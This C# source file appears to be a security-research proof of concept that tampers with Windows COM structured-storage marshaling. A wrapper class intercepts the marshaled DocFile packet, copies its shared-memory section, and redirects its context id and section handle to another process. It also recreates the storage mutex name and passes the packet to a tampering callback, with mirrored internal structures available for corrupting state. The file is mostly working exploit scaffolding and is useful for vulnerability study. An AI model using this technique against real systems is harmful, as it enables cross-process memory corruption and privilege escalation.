﻿using NtApiDotNet;
using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Runtime.InteropServices.ComTypes;

namespace StorageResearch
{
    class IStreamImpl : IStream, IDisposable
    {
        private Stream m_stream;

        public IStreamImpl(Stream stream)
        {
            m_stream = stream;
        }

        public IStreamImpl(string strFileName, FileMode mode, FileAccess access, FileShare share)
        {
            m_stream = File.Open(strFileName, mode, access, share);
        }

        public void Dispose()
        {
            m_stream.Dispose();
        }

        public void Close()
        {
            Dispose();
        }

        public void Clone(out IStream pStm)
        {
            throw new NotImplementedException();
        }

        public void Stat(out System.Runtime.InteropServices.ComTypes.STATSTG statStg, int grfFlags)
        {
            statStg = new System.Runtime.InteropServices.ComTypes.STATSTG();
            statStg.cbSize = m_stream.Length;
        }

        public void UnlockRegion(long libOffset, long cb, int dwLockType)
        {
            throw new NotImplementedException();
        }

        public void LockRegion(long libOffset, long cb, int dwLockType)
        {
            throw new NotImplementedException();
        }

        public void Revert()
        {
            throw new NotImplementedException();
        }

        public void Commit(int grfCommitFlags)
        {
            throw new NotImplementedException();
        }

        public void CopyTo(IStream pstm, long cb, IntPtr pcbRead, IntPtr pcbWritten)
        {
            throw new NotImplementedException();
        }

        public void SetSize(long lSize)
        {
            throw new NotImplementedException();
        }

        public void Seek(long dlibMove, int dwOrigin, IntPtr plibNewPosition)
        {
            SeekOrigin origin;

            switch (dwOrigin)
            {
                case 0:
                    origin = SeekOrigin.Begin;
                    break;
                case 1:
                    origin = SeekOrigin.Current;
                    break;
                case 2:
                    origin = SeekOrigin.End;
                    break;
                default: throw new ArgumentException();
            }
            m_stream.Seek(dlibMove, origin);
            if (plibNewPosition != IntPtr.Zero)
            {
                Marshal.WriteInt64(plibNewPosition, m_stream.Position);
            }
        }

        public void Read(byte[] pv, int cb, IntPtr pcbRead)
        {
            int readCount = m_stream.Read(pv, 0, cb);
            if (pcbRead != IntPtr.Zero)
            {
                Marshal.WriteInt32(pcbRead, readCount);
            }
        }

        public void Write(byte[] pv, int cb, IntPtr pcbWritten)
        {
            m_stream.Write(pv, 0, cb);
            if (pcbWritten != IntPtr.Zero)
            {
                Marshal.WriteInt32(pcbWritten, cb);
            }
        }
    }

    [ComImport]
    [Guid("0000000d-0000-0000-C000-000000000046")]
    [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    public interface IEnumSTATSTG
    {
        // The user needs to allocate an STATSTG array whose size is celt.
        [PreserveSig]
        int Next(uint celt, [MarshalAs(UnmanagedType.LPArray), Out]System.Runtime.InteropServices.ComTypes.STATSTG[] rgelt, out uint pceltFetched);

        void Skip(uint celt);

        void Reset();

        [return: MarshalAs(UnmanagedType.Interface)]
        IEnumSTATSTG Clone();
    }

    [StructLayout(LayoutKind.Explicit)]
    public class FILETIMEOptional
    {
        [FieldOffset(0)]
        public System.Runtime.InteropServices.ComTypes.FILETIME FileTime;
        [FieldOffset(0)]
        public long QuadPart;

        public FILETIMEOptional(DateTime datetime)
        {
            QuadPart = datetime.ToFileTime();
        }

        public FILETIMEOptional()
        {
        }
    }

    [ComImport, Guid("0000000B-0000-0000-C000-000000000046"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    public interface IStorage
    {
        [return: MarshalAs(UnmanagedType.Interface)]
        IStream CreateStream([In, MarshalAs(UnmanagedType.BStr)] string pwcsName, [In, MarshalAs(UnmanagedType.U4)] STGM grfMode, [In, MarshalAs(UnmanagedType.U4)] int reserved1, [In, MarshalAs(UnmanagedType.U4)] int reserved2);
        [return: MarshalAs(UnmanagedType.Interface)]
        IStream OpenStream([In, MarshalAs(UnmanagedType.BStr)] string pwcsName, IntPtr reserved1, [In, MarshalAs(UnmanagedType.U4)] STGM grfMode, [In, MarshalAs(UnmanagedType.U4)] int reserved2);
        [return: MarshalAs(UnmanagedType.Interface)]
        IStorage CreateStorage([In, MarshalAs(UnmanagedType.BStr)] string pwcsName, [In, MarshalAs(UnmanagedType.U4)] STGM grfMode, [In, MarshalAs(UnmanagedType.U4)] int reserved1, [In, MarshalAs(UnmanagedType.U4)] int reserved2);
        [return: MarshalAs(UnmanagedType.Interface)]
        IStorage OpenStorage([In, MarshalAs(UnmanagedType.BStr)] string pwcsName, IntPtr pstgPriority, [In, MarshalAs(UnmanagedType.U4)] STGM grfMode, IntPtr snbExclude, [In, MarshalAs(UnmanagedType.U4)] int reserved);
        void CopyTo(int ciidExclude, [In, MarshalAs(UnmanagedType.LPArray)] Guid[] pIIDExclude, IntPtr snbExclude, [In, MarshalAs(UnmanagedType.Interface)] IStorage stgDest);
        void MoveElementTo([In, MarshalAs(UnmanagedType.BStr)] string pwcsName, [In, MarshalAs(UnmanagedType.Interface)] IStorage stgDest, [In, MarshalAs(UnmanagedType.BStr)] string pwcsNewName, [In, MarshalAs(UnmanagedType.U4)] int grfFlags);
        void Commit(int grfCommitFlags);
        void Revert();
        void EnumElements([In, MarshalAs(UnmanagedType.U4)] int reserved1, IntPtr reserved2, [In, MarshalAs(UnmanagedType.U4)] int reserved3, [MarshalAs(UnmanagedType.Interface)] out IEnumSTATSTG ppVal);
        void DestroyElement([In, MarshalAs(UnmanagedType.BStr)] string pwcsName);
        void RenameElement([In, MarshalAs(UnmanagedType.BStr)] string pwcsOldName, [In, MarshalAs(UnmanagedType.BStr)] string pwcsNewName);
        void SetElementTimes([In, MarshalAs(UnmanagedType.BStr)] string pwcsName, [In] FILETIMEOptional pctime, [In] FILETIMEOptional patime, [In] FILETIMEOptional pmtime);
        void SetClass([In] ref Guid clsid);
        void SetStateBits(int grfStateBits, int grfMask);
        void Stat(out System.Runtime.InteropServices.ComTypes.STATSTG pStatStg, int grfStatFlag);
    }

    [ComImport, Guid("00000003-0000-0000-C000-000000000046"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    public interface IMarshal
    {
        void GetUnmarshalClass(ref Guid riid, IntPtr pv, uint dwDestContext, IntPtr pvDestContext, uint MSHLFLAGS, out Guid pCid);
        void GetMarshalSizeMax(ref Guid riid, IntPtr pv, uint dwDestContext, IntPtr pvDestContext, uint MSHLFLAGS, out uint pSize);
        void MarshalInterface(IStream pstm, ref Guid riid, IntPtr pv, uint dwDestContext, IntPtr pvDestContext, uint MSHLFLAGS);
        void UnmarshalInterface(IStream pstm, ref Guid riid, out IntPtr ppv);
        void ReleaseMarshalData(IStream pstm);
        void DisconnectObject(uint dwReserved);
    }

    public class SharedMemory
    {
        internal NtSection LocalSection { get; }
        internal NtMappedSection LocalMap { get; }
        public int RemoteProcessId { get; }
        public int RemoteHandle { get; }
        internal IAudioClient Client { get; }
        public int TargetProcessId { get; }
        public int CurrentProcessId { get; }

        private IntPtr CalculateAddress(IntPtr offset)
        {
            return new IntPtr(LocalMap.DangerousGetHandle().ToInt64() + 8 + offset.ToInt64());
        }

        public T ReadStruct<T>(IntPtr offset) 
        {
            return Marshal.PtrToStructure<T>(CalculateAddress(offset));

            //return LocalMap.Read<T>((ulong)offset.ToInt64() + 8);
        }

        public void WriteStruct<T>(IntPtr offset, T value)
        {
            Marshal.StructureToPtr(value, CalculateAddress(offset), false);
            //long addr = LocalMap.DangerousGetHandle().ToInt64() + 8 + offset.ToInt64();
            //return Marshal.PtrToStructure<T>(new IntPtr(addr));

            //LocalMap.Write((ulong)offset.ToInt64() + 8, value);
        }

        internal SharedMemory(int local_handle, int remote_pid, int remote_handle, IAudioClient client, int target_pid, int current_pid)
        {
            LocalSection = NtSection.FromHandle(new SafeKernelObjectHandle(new IntPtr(local_handle), false));
            LocalMap = LocalSection.MapReadWrite();
            RemoteProcessId = remote_pid;
            RemoteHandle = remote_handle;
            Client = client;
            TargetProcessId = target_pid;
            CurrentProcessId = current_pid;
        }

        public void WaitForDebugger()
        {
            Console.WriteLine("Attach debugger to PID {0} then hit ENTER", TargetProcessId);
            Console.ReadLine();
        }
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct SDfMarshalPacket
    {
        public IntPtr pdf; // CBasedPubDocFilePtr
        public IntPtr pst; // CBasedPubStreamPtr
        public IntPtr psp; // CBasedSeekPointerPtr
        public IntPtr pml; // CBasedMarshalListPtr
        public IntPtr pdfb; // CBasedDFBasisPtr
        public IntPtr pgc; // CBasedGlobalContextPtr
        public IntPtr fsBase; // CBasedGlobalFileStreamPtr
        public IntPtr fsDirty; // CBasedGlobalFileStreamPtr
        public IntPtr fsOriginal; // CBasedGlobalFileStreamPtr
        public uint ulHeapName;
        public int cntxid;
        public Guid cntxkey;
        public IntPtr ppc; //CPerContext*
        public IntPtr hMem; // void*
    };

    [StructLayout(LayoutKind.Sequential)]
    public struct CContextList
    {
        public IntPtr _pctxHead;
        public int _cReferences;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct CGlobalContext
    {
        public CContextList _list;
        public int _fTakeLock;
        public uint _dfOpenLock;
        public IntPtr _pMalloc;
        public int _fCreated;
        public long _luidMutexName;
        //_GLOBAL_SHARED_CRITICAL_SECTION _GlobalPortion;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct CFileStream
    {
        public IntPtr ILockBytes_vfptr;
        public IntPtr IFileLockBytes_vfptr;
        public IntPtr IFillLockBytes_vfptr;
        public IntPtr IFillInfo_vfptr;

        // CContext
        public int ctxid;
        public IntPtr pctxNext; // CBasedContextPtr 

        // CFileStream
        public IntPtr _pgfst; // CGlobalFileStream* 
        public IntPtr _ppc; // CPerContext* 
        public IntPtr _hFile;
        public IntPtr _hPreDuped;
        public uint _sig;
        public int _cReferences;
        public IntPtr _pMalloc; // IMalloc* const 
        public IntPtr _hMapObject;
        public IntPtr _pbBaseAddr; // char* 
        public uint _cbViewSize;
    }

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct CGlobalFileStream
    {
        public CContextList _list;
        public uint _df;
        public uint _dwStartFlags;
        public IntPtr _pMalloc; // IMalloc* const 
        public long _ulPos;
        public uint _cbSector;
        public uint _cbMappedFileSize;
        public uint _cbMappedCommitSize;
        public uint _dwMapFlags;
        [MarshalAs(UnmanagedType.ByValArray, SizeConst = 261)]
        public char[] _awcPath;
        public uint _dwTerminate;
        public long _ulHighWater;
        public long _ulFailurePoint;
        public long _pTempFileSourceFileStream; // CBasedGlobalFileStreamPtr 
    }

    [ComVisible(true)]
    public class TestClass : IMarshal, IStorage
    {
        private readonly IStorage _stg;
        private readonly IMarshal _msh;
        private readonly SharedMemory _shm;
        private readonly Func<SDfMarshalPacket, SharedMemory, SDfMarshalPacket> _callback;
        private NtEvent _mutant;

        internal TestClass(IStorage stg, SharedMemory shm, Func<SDfMarshalPacket, SharedMemory, SDfMarshalPacket> callback)
        {
            _stg = stg;
            _msh = (IMarshal)stg;
            _shm = shm;
            _callback = callback;
        }

        public void DisconnectObject(uint dwReserved)
        {
            _msh.DisconnectObject(dwReserved);
        }

        public void GetMarshalSizeMax(ref Guid riid, IntPtr pv, uint dwDestContext, IntPtr pvDestContext, uint MSHLFLAGS, out uint pSize)
        {
            _msh.GetMarshalSizeMax(ref riid, pv, dwDestContext, pvDestContext, MSHLFLAGS, out pSize);
        }

        public void GetUnmarshalClass(ref Guid riid, IntPtr pv, uint dwDestContext, IntPtr pvDestContext, uint MSHLFLAGS, out Guid pCid)
        {
            dwDestContext = 0;
            _msh.GetUnmarshalClass(ref riid, pv, dwDestContext, pvDestContext, MSHLFLAGS, out pCid);
        }

        private IntPtr GetRelativeAddress(IntPtr offset)
        {
            return new IntPtr(_shm.LocalMap.DangerousGetHandle().ToInt64() + 8 + offset.ToInt64());
        }

        void ReadObjRef(byte[] object_data)
        {
            MemoryStream stm = new MemoryStream(object_data);
            BinaryReader reader = new BinaryReader(stm);
            Guid marshal_iid = reader.ReadGuid();
            uint flags = reader.ReadUInt32();
            if ((flags & 0x80000000) != 0 && !Environment.Is64BitProcess)
            {
                throw new ArgumentException("Can only inspect objects of the same bitness");
            }
            Console.WriteLine("IID: {0} Flags: {1:X08}", marshal_iid, flags);
            COMObjRef marshal_obj = COMObjRef.FromReader(reader);
            Console.WriteLine(marshal_obj);
            long struct_pos = stm.Position;
            byte[] data = reader.ReadAll(Marshal.SizeOf<SDfMarshalPacket>());
            var handle = GCHandle.Alloc(data, GCHandleType.Pinned);
            try
            {
                SDfMarshalPacket packet = Marshal.PtrToStructure<SDfMarshalPacket>(handle.AddrOfPinnedObject());
                Console.WriteLine($"cntxid: {packet.cntxid:X}");
                Console.WriteLine($"fsBase: {packet.fsBase.ToInt64():X}");
                Console.WriteLine($"fsDirty: {packet.fsDirty.ToInt64():X}");
                Console.WriteLine($"fsOriginal: {packet.fsOriginal.ToInt64():X}");
                Console.WriteLine($"hMem: {packet.hMem.ToInt64():X}");
                Console.WriteLine($"pdf: {packet.pdf.ToInt64():X}");
                Console.WriteLine($"pdfb: {packet.pdfb.ToInt64():X}");
                Console.WriteLine($"pgc: {packet.pgc.ToInt64():X}");
                Console.WriteLine($"pml: {packet.pml.ToInt64():X}");
                Console.WriteLine($"ppc: {packet.ppc.ToInt64():X}");
                Console.WriteLine($"psp: {packet.psp.ToInt64():X}");
                Console.WriteLine($"pst: {packet.pst.ToInt64():X}");
                Console.WriteLine($"ulHeapName: {packet.ulHeapName:X}");
                using (NtSection section = NtSection.FromHandle(new SafeKernelObjectHandle(packet.hMem, false)))
                {
                    Console.WriteLine("Section Size: {0}", section.Size);
                    using (NtMappedSection map = section.MapReadWrite())
                    {
                        var commit_size = NtProcess.Current.QueryMemoryInformation(map.DangerousGetHandle().ToInt64()).RegionSize;
                        Console.WriteLine("Committed: {0}", commit_size);
                        if (commit_size > _shm.LocalSection.Size)
                        {
                            throw new ArgumentException();
                        }
                        byte[] in_data = new byte[commit_size];
                        map.ReadArray(0, in_data, 0, in_data.Length);
                        _shm.LocalMap.WriteArray(0, in_data, 0, in_data.Length);
                        packet.cntxid = _shm.RemoteProcessId;
                        packet.hMem = new IntPtr(_shm.RemoteHandle);

                        var global_ctx = _shm.ReadStruct<CGlobalContext>(packet.pgc);
                        string mutex_name = $"OleDfRoot{global_ctx._luidMutexName:X}";
                        Console.WriteLine(mutex_name);
                        _mutant = NtEvent.Create($@"\BaseNamedObjects\{mutex_name}", EventType.SynchronizationEvent, false);

                        Marshal.StructureToPtr(_callback(packet, _shm), handle.AddrOfPinnedObject(), false);
                    }
                }
            }
            finally
            {
                handle.Free();
            }
            Buffer.BlockCopy(data, 0, object_data, (int)struct_pos, data.Length);
        }

        public void MarshalInterface(IStream pstm, ref Guid riid, IntPtr pv, uint dwDestContext, IntPtr pvDestContext, uint MSHLFLAGS)
        {
            MemoryStream stm = new MemoryStream();
            IStreamImpl istm = new IStreamImpl(stm);

            _msh.MarshalInterface(istm, ref riid, pv, 0, IntPtr.Zero, MSHLFLAGS);
            Console.WriteLine("Marshaled {0}", stm.Length);
            byte[] data = stm.ToArray();
            ReadObjRef(data);
            pstm.Write(data, data.Length, IntPtr.Zero);
        }

        public void ReleaseMarshalData(IStream pstm)
        {
            _msh.ReleaseMarshalData(pstm);
        }

        public void UnmarshalInterface(IStream pstm, ref Guid riid, out IntPtr ppv)
        {
            _msh.UnmarshalInterface(pstm, ref riid, out ppv);
        }

        [return: MarshalAs(UnmanagedType.Interface)]
        public IStream CreateStream([In, MarshalAs(UnmanagedType.BStr)] string pwcsName, [In, MarshalAs(UnmanagedType.U4)] STGM grfMode, [In, MarshalAs(UnmanagedType.U4)] int reserved1, [In, MarshalAs(UnmanagedType.U4)] int reserved2)
        {
            return _stg.CreateStream(pwcsName, grfMode, reserved1, reserved2);
        }

        [return: MarshalAs(UnmanagedType.Interface)]
        public IStream OpenStream([In, MarshalAs(UnmanagedType.BStr)] string pwcsName, IntPtr reserved1, [In, MarshalAs(UnmanagedType.U4)] STGM grfMode, [In, MarshalAs(UnmanagedType.U4)] int reserved2)
        {
            return _stg.OpenStream(pwcsName, reserved1, grfMode, reserved2);
        }

        [return: MarshalAs(UnmanagedType.Interface)]
        public IStorage CreateStorage([In, MarshalAs(UnmanagedType.BStr)] string pwcsName, [In, MarshalAs(UnmanagedType.U4)] STGM grfMode, [In, MarshalAs(UnmanagedType.U4)] int reserved1, [In, MarshalAs(UnmanagedType.U4)] int reserved2)
        {
            return _stg.CreateStorage(pwcsName, grfMode, reserved1, reserved2);
        }

        [return: MarshalAs(UnmanagedType.Interface)]
        public IStorage OpenStorage([In, MarshalAs(UnmanagedType.BStr)] string pwcsName, IntPtr pstgPriority, [In, MarshalAs(UnmanagedType.U4)] STGM grfMode, IntPtr snbExclude, [In, MarshalAs(UnmanagedType.U4)] int reserved)
        {
            return _stg.OpenStorage(pwcsName, pstgPriority, grfMode, snbExclude, reserved);
        }

        public void CopyTo(int ciidExclude, [In, MarshalAs(UnmanagedType.LPArray)] Guid[] pIIDExclude, IntPtr snbExclude, [In, MarshalAs(UnmanagedType.Interface)] IStorage stgDest)
        {
            _stg.CopyTo(ciidExclude, pIIDExclude, snbExclude, stgDest);
        }

        public void MoveElementTo([In, MarshalAs(UnmanagedType.BStr)] string pwcsName, [In, MarshalAs(UnmanagedType.Interface)] IStorage stgDest, [In, MarshalAs(UnmanagedType.BStr)] string pwcsNewName, [In, MarshalAs(UnmanagedType.U4)] int grfFlags)
        {
            _stg.MoveElementTo(pwcsName, stgDest, pwcsNewName, grfFlags);
        }

        public void Commit(int grfCommitFlags)
        {
            _stg.Commit(grfCommitFlags);
        }

        public void Revert()
        {
            _stg.Revert();
        }

        public void EnumElements([In, MarshalAs(UnmanagedType.U4)] int reserved1, IntPtr reserved2, [In, MarshalAs(UnmanagedType.U4)] int reserved3, [MarshalAs(UnmanagedType.Interface)] out IEnumSTATSTG ppVal)
        {
            _stg.EnumElements(reserved1, reserved2, reserved3, out ppVal);
        }

        public void DestroyElement([In, MarshalAs(UnmanagedType.BStr)] string pwcsName)
        {
            _stg.DestroyElement(pwcsName);
        }

        public void RenameElement([In, MarshalAs(UnmanagedType.BStr)] string pwcsOldName, [In, MarshalAs(UnmanagedType.BStr)] string pwcsNewName)
        {
            _stg.RenameElement(pwcsOldName, pwcsNewName);
        }

        public void SetElementTimes([In, MarshalAs(UnmanagedType.BStr)] string pwcsName, [In] FILETIMEOptional pctime, [In] FILETIMEOptional patime, [In] FILETIMEOptional pmtime)
        {
            _stg.SetElementTimes(pwcsName, pctime, patime, pmtime);
        }

        public void SetClass([In] ref Guid clsid)
        {
            _stg.SetClass(ref clsid);
        }

        public void SetStateBits(int grfStateBits, int grfMask)
        {
            _stg.SetStateBits(grfStateBits, grfMask);
        }

        public void Stat(out System.Runtime.InteropServices.ComTypes.STATSTG pStatStg, int grfStatFlag)
        {
            _stg.Stat(out pStatStg, grfStatFlag);
            pStatStg.pwcsName = "hello.stg";
        }
    }
}